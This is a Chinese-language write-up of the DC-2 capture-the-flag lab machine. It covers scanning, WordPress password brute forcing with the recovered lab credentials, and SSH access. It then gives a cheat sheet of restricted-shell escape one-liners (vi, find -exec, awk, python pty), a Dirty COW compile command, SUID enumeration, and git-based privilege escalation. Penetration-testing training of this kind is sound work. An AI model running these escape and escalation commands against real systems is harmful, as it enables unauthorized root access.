DC-2渗透测试
0x00实验环境
靶机:DC-2,IP地址:192.168.8.133
测试机:Kali,IP地址:192.168.8.128;
0x01实验流程
信息收集——主机发现、端口扫描
渗透测试
0x02实验步骤
- 主机发现
- Masscan以及nmap扫描
- 修改hosts文件,访问web
发现是wordpress的CMS并得到提示需要cewl制作针对性字典
- bp爆破登录密码
得到:
tom :parturient
jerry : adipiscing
- 登录wordpress
TOM:
Jerry:
在jerry账户下发现flag2
- 尝试用ssh登录DC-2
ssh tom@dc-2 -p 7744
但是发现shell受到了限制,尝试绕过限制
切换到jerry
- jerry用户好像可以用git命令
尝试git提权
sudo git help config
!/bin/bash
提权成功
总结:
- shell绕过(rbash-受限制的bash)
首先查看当前用户可以使用的命令
echo $PATH #查看自己可以使用的命令
然后进行绕过尝试
1.
vi test
:!/bin/sh
2.ed
3.ne
4. more less
more test
!'sh'
5.
man ls
操作同more less
6.find
/usr/bin/find /etc/passwd -exec whoami \;
/usr/bin/find /etc/passwd -exec /bin/sh \;
7.nmap
低版本
8.awk
awk 'BEGIN {system("/bin/sh")}'
9.python
python -c "import os;os.system('whoami')"
python -c "import os;os.system('/bin/sh')"
python -c "import pty;pty.spawn('/bin/sh')"
10.ruby
11.perl
12.php
13.
BASH_CMDS[a]=/bin/sh;a
- 提权
- 脏牛提权
Gcc -pthread dirty.c –o exp -lcrypt
- Suid提权
条件:
运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -user root -perm -4000 -print 2>/dev/null
三种都可以
搜索可以提权的程序,一般有以下 :
nmap vim find Bash More Less Nano cp
- Git提权
可以使用git命令时:
sudo git help config
!/bin/bash或者!'sh'完成提权
sudo git -p help
!/bin/bash